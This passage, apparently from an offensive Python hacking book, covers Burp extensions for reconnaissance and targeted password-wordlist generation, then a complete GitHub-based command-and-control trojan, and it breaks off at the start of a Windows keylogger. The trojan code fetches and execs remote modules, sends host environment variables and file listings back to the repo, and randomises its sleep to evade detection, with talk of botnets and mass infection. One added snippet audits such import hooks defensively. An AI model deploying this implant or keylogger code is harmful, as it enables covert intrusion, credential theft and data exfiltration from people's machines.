Our bing_menu function gets triggered when the user clicks the context menu item we defined. We retrieve all of the HTTP requests that were highlighted ➊ and then retrieve the host portion of the request for each one and send it to our bing_search function for further processing. The bing_search function first determines if we were passed an IP address or a hostname ➋. We then query Bing for all virtual hosts that have the same IP address ➌ as the host contained within the HTTP request that was right-clicked. If a domain has been passed to our extension, then we also do a secondary search ➍ for any subdomains that Bing may have indexed. Now let's install the plumbing to use Burp's HTTP API to send the request to Bing and parse the results. Add the following code, ensuring that you're tabbed correctly into our BurpExtender class, or you'll run into errors.
    def bing_query(self, bing_query_string):
        print "Performing Bing search: %s" % bing_query_string

        # encode our query
        quoted_query = urllib.quote(bing_query_string)

        http_request = "GET https://api.datamarket.azure.com/Bing/Search/Web?$format=json&$top=20&Query=%s HTTP/1.1\r\n" % quoted_query
        http_request += "Host: api.datamarket.azure.com\r\n"
        http_request += "Connection: close\r\n"
        http_request += "Authorization: Basic %s\r\n" % base64.b64encode(":%s" % bing_api_key)   # ➊
        http_request += "User-Agent: Blackhat Python\r\n\r\n"

        json_body = self._callbacks.makeHttpRequest("api.datamarket.azure.com", 443, True, http_request).tostring()   # ➋

        try:
            # drop the response headers; a response with no body at all
            # ends up in the except branch like any other failure
            json_body = json_body.split("\r\n\r\n", 1)[1]   # ➌

            r = json.loads(json_body)   # ➍

            if len(r["d"]["results"]):
                for site in r["d"]["results"]:
                    print "*" * 100   # ➎
                    print site['Title']
                    print site['Url']
                    print site['Description']
                    print "*" * 100

                    j_url = URL(site['Url'])
                    if not self._callbacks.isInScope(j_url):   # ➏
                        print "Adding to Burp scope"
                        self._callbacks.includeInScope(j_url)
        except (IndexError, ValueError, KeyError) as e:
            # no body, non-JSON body (e.g. an HTML error page), or an
            # unexpected JSON shape: report it instead of swallowing it silently
            print "No results from Bing (%s)" % e
        return
Okay! Burp's HTTP API requires that we build up the entire HTTP request as a string before sending it off, and in particular you can see that we need to base64-encode ➊ our Bing API key and use HTTP basic authentication to make the API call. We then send our HTTP request ➋ to the Microsoft servers. When the response returns, we'll have the entire response including the headers, so we split the headers off ➌ and then pass it to our JSON parser ➍. For each set of results, we output some information about the site that we discovered ➎ and if the discovered site is not in Burp's target scope ➏, we automatically add it. This is a great blend of using the Jython API and pure Python in a Burp extension to do additional recon work when attacking a particular target.

Two caveats before you run it. First, the Azure Datamarket endpoint used here has since been retired by Microsoft; against a current Bing search API only the URL, the authentication header (newer endpoints take a subscription-key header rather than basic auth) and the JSON field names change, while the Burp side (makeHttpRequest, the scope checks and the context menu) stays the same. Second, includeInScope widens what Burp's scanner and spider are allowed to touch, and a search index can be stale, so confirm that a returned host really does still share the IP with your target before you launch anything noisy against it. Let's take it for a spin.
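The non-Burp part of the extension, as an added Python 3 example that is not the book's code, so it can be exercised offline: classifying the right-clicked host and building the two query strings, splitting the raw response into headers and body, pulling the result URLs out of the JSON, and deciding which hosts are new to scope. The Datamarket JSON shape, the sample response, the FAKE_DNS table and the in_scope callback are all constructed stand-ins for the real API, for socket.gethostbyname and for isInScope. Unlike the book's regex, the IP check here is strict (a hostname like 1.2.3.4.nip.io is not an address) and a non-200 response is treated as an error rather than as "no results".

```python
import ipaddress
import json
from urllib.parse import urlsplit


def build_queries(host, resolve):
    """Return the Bing query strings the extension would issue for a
    right-clicked host, in order. An IP literal gets only the ip: query; a
    hostname gets ip: for what it resolves to plus domain: for subdomains.
    `resolve` is injected (hostname -> IP string or None) so this runs offline."""
    try:
        ipaddress.ip_address(host)   # strict: "1.2.3.4.nip.io" is a hostname, "2001:db8::1" an IP
        return ["'ip:%s'" % host]
    except ValueError:
        pass
    ip = resolve(host)
    if ip is None:
        return []   # unresolvable: no address to pivot on, nothing to add to scope
    return ["'ip:%s'" % ip, "'domain:%s'" % host]


def parse_search_response(raw):
    """Split a raw HTTP response, as makeHttpRequest hands it back, into
    status line, headers and body, and return the result URLs from a
    Datamarket-style JSON body. Anything but a 200 with a parseable body
    raises, because an auth failure is not the same thing as no results."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator in response")
    status_line = head.split(b"\r\n", 1)[0]
    parts = status_line.split(b" ")
    if len(parts) < 2 or parts[1] != b"200":
        raise ValueError("search API returned: %s" % status_line.decode("latin-1"))
    data = json.loads(body.decode("utf-8"))
    return [r["Url"] for r in data.get("d", {}).get("results", []) if "Url" in r]


def hosts_to_add(urls, in_scope):
    """Hostnames from the result URLs that are not yet in scope, deduplicated
    and in first-seen order. `in_scope` stands in for isInScope()."""
    seen, new = set(), []
    for url in urls:
        host = urlsplit(url).hostname
        if not host or host in seen:
            continue
        seen.add(host)
        if not in_scope(host):
            new.append(host)
    return new


# Constructed sample response (not real Bing output) in the JSON shape the extension parses.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n"
    + json.dumps({"d": {"results": [
        {"Title": "Target", "Url": "http://testphp.vulnweb.com/", "Description": "..."},
        {"Title": "Dev box", "Url": "http://dev.example.test/login", "Description": "..."},
        {"Title": "Same box, TLS", "Url": "https://dev.example.test/admin", "Description": "..."},
    ]}}).encode("utf-8")
)

# Constructed resolver; 192.0.2.0/24 is reserved for documentation.
FAKE_DNS = {"testphp.vulnweb.com": "192.0.2.10"}


if __name__ == "__main__":
    for query in build_queries("testphp.vulnweb.com", FAKE_DNS.get):
        print("Performing Bing search:", query)
    urls = parse_search_response(SAMPLE_RESPONSE)
    print("Adding to Burp scope:", hosts_to_add(urls, lambda h: h == "testphp.vulnweb.com"))
```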

Kicking the Tires

Use the same procedure we used for our fuzzing extension to get the Bing search extension working. When it's loaded, browse to http://testphp.vulnweb.com/, and then right-click the GET request you just issued. If the extension is loaded properly, you should see the menu option Send to Bing displayed as shown in Figure 6-9.

Figure 6-9. New menu option showing our extension

When you click this menu option, depending on the output you chose when you loaded the extension, you should start to see results from Bing as shown in Figure 6-10.

Figure 6-10. Our extension providing output from the Bing API search

And if you click the Target tab in Burp and then select Scope, you will see new items automatically added to our target scope as shown in Figure 6-11. The target scope limits activities such as attacks, spidering, and scans to only those hosts defined.

Figure 6-11. Showing how discovered hosts are automatically added to Burp's target scope

Turning Website Content into Password Gold

Many times, security comes down to one thing: user passwords. It's sad but true. Making things worse, when it comes to web applications, especially custom ones, it's all too common to find that account lockouts aren't implemented. In other instances, strong passwords are not enforced. In these cases, an online password guessing session like the one in the last chapter might be just the ticket to gain access to the site.

The trick to online password guessing is getting the right wordlist. You can't test 10 million passwords if you're in a hurry, so you need to be able to create a wordlist targeted to the site in question. Of course, there are scripts in the Kali Linux distribution that crawl a website and generate a wordlist based on site content. Though if you've already used Burp Spider to crawl the site, why send more traffic just to generate a wordlist? Plus, those scripts usually have a ton of command-line arguments to remember. If you're anything like me, you've already memorized enough command-line arguments to impress your friends, so let's make Burp do the heavy lifting.

Open bhp_wordlist.py and knock out this code.
from burp import IBurpExtender
from burp import IContextMenuFactory
from javax.swing import JMenuItem
from java.util import List, ArrayList
from java.net import URL
import re
from datetime import datetime
from HTMLParser import HTMLParser

class TagStripper(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.page_text = []

    def handle_data(self, data):
        self.page_text.append(data)   # ➊

    def handle_comment(self, data):
        self.handle_data(data)   # ➋

    def strip(self, html):
        self.feed(html)
        return " ".join(self.page_text)   # ➌

class BurpExtender(IBurpExtender, IContextMenuFactory):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        self.context = None
        self.hosts = set()

        # Start with something we know is common
        self.wordlist = set(["password"])   # ➍

        # we set up our extension
        callbacks.setExtensionName("BHP Wordlist")
        callbacks.registerContextMenuFactory(self)
        return

    def createMenuItems(self, context_menu):
        self.context = context_menu
        menu_list = ArrayList()
        menu_list.add(JMenuItem("Create Wordlist", actionPerformed=self.wordlist_menu))
        return menu_list
The code in this listing should be pretty familiar by now. We start by importing the required modules. A helper TagStripper class will allow us to strip the HTML tags out of the HTTP responses we process later on. Its handle_data function stores the page text ➊ in a member variable. We also define handle_comment because we want the words stored in developer comments to be added to our password list as well. Under the covers, handle_comment just calls handle_data ➋ (in case we want to change how we process page text down the road).

The strip function feeds HTML code to the base class, HTMLParser, and returns the resulting page text ➌, which will come in handy later. The rest is almost exactly the same as the start of the bhp_bing.py script we just finished. Once again, the goal is to create a context menu item in the Burp UI. The only thing new here is that we store our wordlist in a set, which ensures that we don't introduce duplicate words as we go. We initialize the set with everyone's favorite password, "password" ➍, just to make sure it ends up in our final list.

Now let's add the logic to take the selected HTTP traffic from Burp and turn it into a base wordlist.
    def wordlist_menu(self, event):
        # grab the details of what the user clicked
        http_traffic = self.context.getSelectedMessages()

        for traffic in http_traffic:
            http_service = traffic.getHttpService()
            host = http_service.getHost()
            self.hosts.add(host)   # ➊

            http_response = traffic.getResponse()
            if http_response:
                self.get_words(http_response)   # ➋

        self.display_wordlist()
        return

    def get_words(self, http_response):
        headers, body = http_response.tostring().split('\r\n\r\n', 1)

        # skip non-text responses
        if headers.lower().find("content-type: text") == -1:   # ➌
            return

        tag_stripper = TagStripper()
        page_text = tag_stripper.strip(body)   # ➍

        words = re.findall(r"[a-zA-Z]\w{2,}", page_text)   # ➎

        for word in words:
            # filter out long strings
            if len(word) <= 12:
                self.wordlist.add(word.lower())   # ➏
        return
Our first order of business is to define the wordlist_menu function, which is our menu-click handler. It saves the name of the responding host ➊ for later, and then retrieves the HTTP response and feeds it to our get_words function ➋. From there, get_words splits out the header from the message body, checking to make sure we're only trying to process text-based responses ➌. Our TagStripper class ➍ strips the HTML code from the rest of the page text. We use a regular expression to find all words starting with an alphabetic character followed by two or more "word" characters ➎. After making the final cut, the successful words are saved in lowercase to the wordlist ➏.

Now let's round out the script by giving it the ability to mangle and display the captured wordlist.
    def mangle(self, word):
        year = datetime.now().year
        suffixes = ["", "1", "!", year]   # ➊
        mangled = []

        for password in (word, word.capitalize()):
            for suffix in suffixes:
                mangled.append("%s%s" % (password, suffix))   # ➋

        return mangled

    def display_wordlist(self):
        print "#!comment: BHP Wordlist for site(s) %s" % ", ".join(self.hosts)   # ➌

        for word in sorted(self.wordlist):
            for password in self.mangle(word):
                print password
        return
Very nice! The mangle function takes a base word and turns it into a number of password guesses based on some common password creation "strategies." In this simple example, we create a list of suffixes to tack on the end of the base word, including the current year ➊. Next we loop through each suffix and add it to the base word ➋ to create a unique password attempt. We do another loop with a capitalized version of the base word for good measure. In the display_wordlist function, we print a "John the Ripper"-style comment ➌ to remind us which sites were used to generate this wordlist. Then we mangle each base word and print the results. Time to take this baby for a spin.
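The whole pipeline above (split off the headers, keep only text responses, strip tags but keep comments, apply the word regex and the length cap, then mangle), as an added Python 3 example that is not the book's code and runs without Burp. It differs from the extension in one deliberate way: script and style bodies are dropped, because JavaScript identifiers and CSS selectors are code rather than words a user would pick as a password. The two HTTP responses are constructed samples, and the year is passed in so the output is stable.

```python
import re
from html.parser import HTMLParser


class TagStripper(HTMLParser):
    """Collect visible text plus HTML comments (developers leave credentials
    and project names in them) and drop script/style bodies."""

    def __init__(self):
        super().__init__()
        self.page_text = []
        self._skip = 0   # depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.page_text.append(data)

    def handle_comment(self, data):
        self.page_text.append(data)

    def strip(self, html):
        self.feed(html)
        self.close()   # flush any buffered trailing text
        return " ".join(self.page_text)


WORD_RE = re.compile(r"[a-zA-Z]\w{2,}")


def words_from_response(raw, max_len=12):
    """raw is a full HTTP response as bytes. Returns the lower-cased candidate
    words, or an empty set for non-text responses and for responses that have
    no header/body separator at all."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return set()
    headers = head.decode("latin-1").lower()
    if "content-type: text" not in headers:
        return set()
    text = TagStripper().strip(body.decode("utf-8", errors="replace"))
    return {w.lower() for w in WORD_RE.findall(text) if len(w) <= max_len}


def mangle(word, year):
    """Same rules as the extension: bare and capitalised, each with the
    suffixes '', '1', '!' and the year."""
    out = []
    for base in (word, word.capitalize()):
        for suffix in ("", "1", "!", str(year)):
            out.append(base + suffix)
    return out


def build_wordlist(responses, year, seed=("password",)):
    """Merge the words from every response with the seed words, then mangle
    them in sorted order, which is the order display_wordlist() prints."""
    words = set(seed)
    for raw in responses:
        words |= words_from_response(raw)
    return [p for w in sorted(words) for p in mangle(w, year)]


# Constructed sample responses (not captured from a real site).
HTML_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
    b"<html><head><title>Acme Widgets</title><style>.hero{color:red}</style></head>"
    b"<body><!-- TODO: remove staging login admin/Widgets2014 -->"
    b"<h1>Welcome to Acme</h1><script>var internalVariableName = 1;</script>"
    b"<p>Our widgets ship worldwide. Contact support for help.</p></body></html>"
)
IMAGE_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n\r\n\x89PNG password"


if __name__ == "__main__":
    for candidate in build_wordlist([HTML_RESPONSE, IMAGE_RESPONSE], year=2014):
        print(candidate)
```

The comment in the sample is the interesting part: "Widgets2014" survives the regex because \w matches digits, which is exactly the kind of leftover a targeted list should catch and a generic one never will.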

Kicking the Tires
Click the Extender tab in Burp, click the Add button, and use the same procedure we used for our previous extensions to get the Wordlist extension working. When you have it loaded, browse to http://testphp.vulnweb.com/.
Right-click the site in the Site Map pane and select Spider this host, as shown in Figure 6-12.
Figure 6-12. Spidering a host with Burp
After Burp has visited all the links on the target site, select all the requests in the top-right pane, right-click them to bring up the context menu, and select Create Wordlist, as shown in Figure 6-13.

Figure 6-13. Sending the requests to the BHP Wordlist extension
Now check the output tab of the extension. In practice, we’d save its output to a file, but for demonstration purposes we display the wordlist in Burp, as shown in Figure 6-14.
You can now feed this list back into Burp Intruder to perform the actual password-guessing attack.

Figure 6-14. A password list based on content from the target website
We have now demonstrated a small subset of the Burp API, including being able to generate our own attack payloads as well as building extensions that interact with the Burp UI. During a penetration test you will often come up against specific problems or automation needs, and the Burp Extender API provides an excellent interface to code your way out of a corner, or at least save you from having to continually copy and paste captured data from Burp to another tool.
In this chapter, we showed you how to build an excellent reconnaissance tool to add to your Burp tool belt. As is, this extension only retrieves the top 20 results from Bing, so as homework you could work on making additional requests to ensure that you retrieve all of the results. This will require doing a bit of reading about the Bing API and writing some code to handle the larger results set. You of course could then tell the Burp spider to crawl each of the new sites you discover and automatically hunt for vulnerabilities!
[13] Visit http://www.bing.com/dev/en-us/dev-center/ to get set up with your own free Bing API key.

Chapter 7. GitHub Command and Control
One of the most challenging aspects of creating a solid trojan framework is asynchronously controlling, updating, and receiving data from your deployed implants. It’s crucial to have a relatively universal way to push code to your remote trojans. This flexibility is required not just to control your trojans in order to perform different tasks, but also because you might have additional code that’s specific to the target operating system.
So while hackers have had lots of creative means of command and control over the years, such as IRC or even Twitter, we’ll try a service actually designed for code. We’ll use GitHub as a way to store implant configuration information and exfiltrated data, as well as any modules that the implant needs in order to execute tasks. We’ll also explore how to hack Python’s native library import mechanism so that as you create new trojan modules, your implants can automatically attempt to retrieve them and any dependent libraries directly from your repo, too. Keep in mind that your traffic to GitHub will be encrypted over SSL, and there are very few enterprises that I’ve seen that actively block GitHub itself.
One thing to note is that we’ll use a public repo to perform this testing; if you’d like to spend the money, you can get a private repo so that prying eyes can’t see what you’re doing. Additionally, all of your modules, configuration, and data can be encrypted using public/private key pairs, which I demonstrate in Chapter 9. Let’s get started!

Setting Up a GitHub Account
If you don’t have a GitHub account, then head over to GitHub.com, sign up, and create a new repository called chapter7. Next, you’ll want to install the Python GitHub API library[14] so that you can automate your interaction with your repo. You can do this from the command line by doing the following:
pip install github3.py
If you haven’t done so already, install the git client. I do my development from a Linux machine, but it works on any platform. Now let’s create a basic structure for our repo. Do the following on the command line, adapting as necessary if you’re on Windows:
$ mkdir trojan
$ cd trojan
$ git init
$ mkdir modules
$ mkdir config
$ mkdir data
$ touch modules/.gitignore
$ touch config/.gitignore
$ touch data/.gitignore
$ git add .
$ git commit -m "Adding repo structure for trojan."
$ git remote add origin https://github.com//chapter7.git
$ git push origin master
Here, we’ve created the initial structure for our repo. The config directory holds configuration files that will be uniquely identified for each trojan. As you deploy trojans, you want each one to perform different tasks, and each trojan will check out its unique configuration file. The modules directory contains any modular code that you want the trojan to pick up and then execute. We will implement a special import hack to allow our trojan to import libraries directly from our GitHub repo. This remote load capability will also allow you to stash third-party libraries in GitHub so you don’t have to continually recompile your trojan every time you want to add new functionality or dependencies. The data directory is where the trojan will check in any collected data, keystrokes, screenshots, and so forth. Now let’s create some simple modules and an example configuration file.

Creating Modules
In later chapters, you will do nasty business with your trojans, such as logging keystrokes and taking screenshots. But to start, let’s create some simple modules that we can easily test and deploy. Open a new file in the modules directory, name it dirlister.py, and enter the following code:
import os

def run(**args):
    print "[*] In dirlister module."
    files = os.listdir(".")
    return str(files)
This little snippet of code simply exposes a run function that lists all of the files in the current directory and returns that list as a string. Each module that you develop should expose a run function that takes a variable number of arguments. This enables you to load each module the same way and leaves enough extensibility so that you can customize the configuration files to pass arguments to the module if you desire.
Now let’s create another module called environment.py.
import os

def run(**args):
    print "[*] In environment module."
    return str(os.environ)
This module simply retrieves any environment variables that are set on the remote machine on which the trojan is executing. Now let’s push this code to our GitHub repo so that it is usable by our trojan. From the command line, enter the following from your main repository directory:
$ git add .
$ git commit -m "Adding new modules"
$ git push origin master
Username: ********
Password: ********
You should then see your code getting pushed to your GitHub repo; feel free to log in to your account and double-check! This is exactly how you can continue to develop code in the future. I will leave the integration of more complex modules to you as a homework assignment. Should you have a hundred deployed trojans, you can push new modules to your GitHub repo and QA them by enabling your new module in a configuration file for your local version of the trojan. This way, you can test on a VM or host hardware that you control before allowing one of your remote trojans to pick up the code and use it.

Trojan Configuration
We want to be able to task our trojan with performing certain actions over a period of time. This means that we need a way to tell it what actions to perform, and what modules are responsible for performing those actions. Using a configuration file gives us that level of control, and it also enables us to effectively put a trojan to sleep (by not giving it any tasks) should we choose to. Each trojan that you deploy should have a unique identifier, both so that you can sort out the retrieved data and so that you can control which trojan performs certain tasks. We’ll configure the trojan to look in the config directory for TROJANID.json, which will return a simple JSON document that we can parse out, convert to a Python dictionary, and then use. The JSON format makes it easy to change configuration options as well. Move into your config directory and create a file called abc.json with the following content:
[
    {
        "module" : "dirlister"
    },
    {
        "module" : "environment"
    }
]
This is just a simple list of modules that we want the remote trojan to run. Later you’ll see how we read in this JSON document and then iterate over each option to get those modules loaded. As you brainstorm module ideas, you may find that it’s useful to include additional configuration options such as execution duration, number of times to run the selected module, or arguments to be passed to the module. Drop into a command line and issue the following commands from your main repo directory.
$ git add .
$ git commit -m "Adding simple config."
$ git push origin master
Username: ********
Password: ********
This configuration document is quite simple. You provide a list of dictionaries that tell the trojan what modules to import and run. As you build up your framework, you can add additional functionality in these configuration options, including methods of exfiltration, as I show you in Chapter 9. Now that you have your configuration files and some simple modules to run, you’ll start building out the main trojan piece.

Building a GitHub-Aware Trojan
Now we’re going to create the main trojan that will suck down configuration options and code to run from GitHub. The first step is to build the necessary code to handle connecting, authenticating, and communicating with the GitHub API. Let’s start by opening a new file called git_trojan.py and entering the following code:
import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
➊ trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules= []
configured = False
task_queue = Queue.Queue()
This is just some simple setup code with the necessary imports, which should keep our overall trojan size relatively small when compiled. I say relatively because most compiled Python binaries using py2exe[15] are around 7MB. The only thing to note is the trojan_id variable ➊ that uniquely identifies this trojan. If you were to explode this technique out to a full botnet, you’d want the capability to generate trojans, set their ID, automatically create a configuration file that’s pushed to GitHub, and then compile the trojan into an executable. We won’t build a botnet today, though; I’ll let your imagination do the work.
Now let’s put the relevant GitHub code in place.
def connect_to_github():
    gh = login(username="yourusername",password="yourpassword")
    repo = gh.repository("yourusername","chapter7")
    branch = repo.branch("master")

    return gh,repo,branch

def get_file_contents(filepath):
    gh,repo,branch = connect_to_github()
    tree = branch.commit.commit.tree.recurse()

    for filename in tree.tree:
        if filepath in filename.path:
            print "[*] Found file %s" % filepath
            blob = repo.blob(filename._json_data['sha'])
            return blob.content

    return None

def get_trojan_config():
    global configured
    config_json = get_file_contents(trojan_config)
    config = json.loads(base64.b64decode(config_json))
    configured = True

    for task in config:
        if task['module'] not in sys.modules:
            exec("import %s" % task['module'])

    return config

def store_module_result(data):
    gh,repo,branch = connect_to_github()
    remote_path = "data/%s/%d.data" % (trojan_id,random.randint(1000,100000))
    repo.create_file(remote_path,"Commit message",base64.b64encode(data))

    return
These four functions represent the core interaction between the trojan and GitHub. The connect_to_github function simply authenticates the user to the repository, and retrieves the current repo and branch objects for use by other functions. Keep in mind that in a real-world scenario, you want to obfuscate this authentication procedure as best as you can. You might also want to think about what each trojan can access in your repository based on access controls so that if your trojan is caught, someone can’t come along and delete all of your retrieved data. The get_file_contents function is responsible for grabbing files from the remote repo and then reading the contents in locally. This is used both for reading configuration options as well as reading module source code. The get_trojan_config function is responsible for retrieving the remote configuration document from the repo so that your trojan knows which modules to run. And the final function store_module_result is used to push any data that you’ve collected on the target machine. Now let’s create an import hack to import remote files from our GitHub repo.

Hacking Python’s import Functionality
If you’ve made it this far in the book, you know that we use Python’s import functionality to pull in external libraries so that we can use the code contained within. We want to be able to do the same thing for our trojan, but beyond that, we also want to make sure that if we pull in a dependency (such as Scapy or netaddr), our trojan makes that module available to all subsequent modules that we pull in. Python allows us to insert our own functionality into how it imports modules, such that if a module cannot be found locally, our import class will be called, which will allow us to remotely retrieve the library from our repo. This is achieved by adding a custom class to the sys.meta_path list.[16] Let’s create a custom loading class now by adding the following code:
class GitImporter(object):

    def __init__(self):
        self.current_module_code = ""

    def find_module(self,fullname,path=None):
        if configured:
            print "[*] Attempting to retrieve %s" % fullname
➊           new_library = get_file_contents("modules/%s" % fullname)

            if new_library is not None:
➋               self.current_module_code = base64.b64decode(new_library)
                return self

        return None

    def load_module(self,name):
➌       module = imp.new_module(name)
➍       exec self.current_module_code in module.__dict__
➎       sys.modules[name] = module

        return module
Every time the interpreter attempts to load a module that isn’t available, our GitImporter class is used. The find_module function is called first in an attempt to locate the module. We pass this call to our remote file loader ➊ and if we can locate the file in our repo, we base64-decode the code and store it in our class ➋. By returning self, we indicate to the Python interpreter that we found the module and it can then call our load_module function to actually load it. We use the native imp module to first create a new blank module object ➌ and then we shovel the code we retrieved from GitHub into it ➍. The last step is to insert our newly created module into the sys.modules list ➎ so that it’s picked up by any future import calls. Now let’s put the finishing touches on the trojan and take it for a spin.
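A module loaded this way is executed from a string rather than a file, which leaves a footprint on the host that a defender can audit: the custom finder sits in sys.meta_path, and the resulting module carries no __file__. The following Python 3 script is an added example, not code from the book: DictImporter is a dictionary-backed stand-in for the GitHub-backed hook (FAKE_REPO is constructed module source, nothing is fetched), and the hypothetical helpers find_foreign_finders and find_memory_loaded_modules show how such a hook and its modules can be spotted from inside the interpreter.

```python
"""Audit the footprint of an in-memory import hook. Added example, not the
book's code: the book's GitImporter fetches source from GitHub; DictImporter
here reads from a constructed dict so the example runs offline on Python 3."""
import importlib.abc
import importlib.util
import sys
import types

# Constructed stand-in for the remote module store (module name -> source text).
FAKE_REPO = {
    "demo_mod": "def run(**args):\n    return 'demo result'\n",
}

# The finders that ship with the interpreter are defined in these modules.
STOCK_FINDER_MODULES = ("importlib", "_frozen_importlib", "_frozen_importlib_external")


class DictImporter(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    """Python 3 counterpart of the chapter's find_module/load_module hook."""

    def find_spec(self, fullname, path=None, target=None):
        if fullname in FAKE_REPO:
            # No origin is supplied, so the module created from this spec
            # will have no __file__ attribute.
            return importlib.util.spec_from_loader(fullname, self)
        return None

    def create_module(self, spec):
        return None  # let the import system build a default module object

    def exec_module(self, module):
        # Same step as "exec code in module.__dict__" in the book's loader.
        exec(FAKE_REPO[module.__name__], module.__dict__)


def find_foreign_finders():
    """Class names of sys.meta_path entries not defined by the import machinery."""
    found = []
    for finder in sys.meta_path:
        cls = finder if isinstance(finder, type) else type(finder)
        origin_module = getattr(cls, "__module__", "") or ""
        if not origin_module.startswith(STOCK_FINDER_MODULES):
            found.append(cls.__name__)
    return found


def find_memory_loaded_modules():
    """Names of loaded modules that are neither built-in/frozen nor file-backed."""
    found = []
    for name, mod in list(sys.modules.items()):
        if not isinstance(mod, types.ModuleType):
            continue  # some packages park None/placeholders in sys.modules
        spec = getattr(mod, "__spec__", None)
        if spec is not None and spec.origin in ("built-in", "frozen"):
            continue
        if getattr(mod, "__file__", None):
            continue  # loaded from disk
        if spec is not None and spec.submodule_search_locations is not None:
            continue  # namespace package: legitimately has no single file
        found.append(name)
    return found


def demo():
    """Install the hook, import through it, run the audit, remove the hook."""
    hook = DictImporter()
    sys.meta_path.insert(0, hook)
    try:
        import demo_mod  # resolved by DictImporter, never touches disk
        report = {
            "result": demo_mod.run(),
            "has_file": hasattr(demo_mod, "__file__"),
            "finders": find_foreign_finders(),
            "memory_modules": find_memory_loaded_modules(),
        }
    finally:
        sys.meta_path.remove(hook)
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The finder audit also lists legitimate third-party finders (editable installs, pytest's assertion rewriter, virtualenv shims), so in practice compare its output against an allow-list rather than treating every entry as hostile.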
def module_runner(module):
    task_queue.put(1)
➊   result = sys.modules[module].run()
    task_queue.get()

    # store the result in our repo
➋   store_module_result(result)

    return

# main trojan loop
➌ sys.meta_path = [GitImporter()]

while True:

    if task_queue.empty():
➍       config = get_trojan_config()

        for task in config:
➎           t = threading.Thread(target=module_runner,args=(task['module'],))
            t.start()
            time.sleep(random.randint(1,10))

    time.sleep(random.randint(1000,10000))
We first make sure to add our custom module importer ➌ before we begin the main loop of our application. The first step is to grab the configuration file from the repo ➍ and then we kick off the module in its own thread ➎. While we’re in the module_runner function, we simply call the module’s run function ➊ to kick off its code. When it’s done running, we should have the result in a string that we then push to our repo ➋. The end of our trojan will then sleep for a random amount of time in an attempt to foil any network pattern analysis. You could of course create a bunch of traffic to Google.com or any number of other things in an attempt to disguise what your trojan is up to. Now let’s take it for a spin!

Kicking the Tires
All right! Let’s take this thing for a spin by running it from the command line.
WARNING
If you have sensitive information in files or environment variables, remember that without a private repository, that information is going to go up to GitHub for the whole world to see. Don’t say I didn’t warn you — and of course you can use some encryption techniques from Chapter 9.
$ python git_trojan.py
[*] Found file abc.json
[*] Attempting to retrieve dirlister
[*] Found file modules/dirlister
[*] Attempting to retrieve environment
[*] Found file modules/environment
[*] In dirlister module
[*] In environment module.
Perfect. It connected to my repository, retrieved the configuration file, pulled in the two modules we set in the configuration file, and ran them.
Now if you drop back into your command line from your trojan directory, enter:
$ git pull origin master
From https://github.com/blackhatpythonbook/chapter7
* branch master -> FETCH_HEAD
Updating f4d9c1d..5225fdf
Fast-forward
data/abc/29008.data | 1 +
data/abc/44763.data | 1 +
2 files changed, 2 insertions(+), 0 deletions(-)
create mode 100644 data/abc/29008.data
create mode 100644 data/abc/44763.data
Awesome! Our trojan checked in the results of our two running modules.
There are a number of improvements and enhancements that you can make to this core command-and-control technique. Encryption of all your modules, configuration, and exfiltrated data would be a good start. Automating the backend management of pull-down data, updating configuration files, and rolling out new trojans would also be required if you were going to infect on a massive scale. As you add more and more functionality, you also need to extend how Python loads dynamic and compiled libraries. For now, let’s work on creating some standalone trojan tasks, and I’ll leave it to you to integrate them into your new GitHub trojan.
[14] The repo where this library is hosted is here: https://github.com/copitux/python-github3/.
[15] You can check out py2exe here: http://www.py2exe.org/.
[16] An awesome explanation of this process written by Karol Kuczmarski can be found here: http://xion.org.pl/2012/05/06/hacking-python-imports/.

Chapter 8. Common Trojaning Tasks on Windows
When you deploy a trojan, you want to perform a few common tasks: grab keystrokes, take screenshots, and execute shellcode to provide an interactive session to tools like CANVAS or Metasploit. This chapter focuses on these tasks. We’ll wrap things up with some sandbox detection techniques to determine if we are running within an antivirus or forensics sandbox. These modules will be easy to modify and will work within our trojan framework. In later chapters, we’ll explore man-in-the-browser-style attacks and privilege escalation techniques that you can deploy with your trojan. Each technique comes with its own challenges and probability of being caught by the end user or an antivirus solution. I recommend that you carefully model your target after you’ve implanted your trojan so that you can test the modules in your lab before trying them on a live target. Let’s get started by creating a simple keylogger.

Keylogging for Fun and Keystrokes
Keylogging is one of the oldest tricks in the book and is still employed with various levels of stealth today. Attackers still use it because it’s extremely effective at capturing sensitive information such as credentials or conversations.
An excellent Python library named PyHook[17] enables us to easily trap all keyboard events. It takes advantage of the native Windows function SetWindowsHookEx, which allows you to install a user-defined function to be called for certain Windows events. By registering a hook for keyboard events, we are able to trap all of the keypresses that a target issues. On top of this, we want to know exactly what process they are executing these keystrokes against, so that we can determine when usernames, passwords, or other tidbits of useful information are entered. PyHook takes care of all of the low-level programming for us, which leaves the core logic of the keystroke logger up to us. Let’s crack open keylogger.py and drop in some of the plumbing:
from ctypes import *
import pythoncom
import pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None

def get_current_process():

    # get a handle to the foreground window
➊   hwnd = user32.GetForegroundWindow()

    # find the process ID
    pid = c_ulong(0)
➋   user32.GetWindowThreadProcessId(hwnd, byref(pid))

    # store the current process ID
    process_id = "%d" % pid.value

    # grab the executable
    executable = create_string_buffer("\x00" * 512)
➌   h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
➍   psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)

    # now read its title
    window_title = create_string_buffer("\x00" * 512)
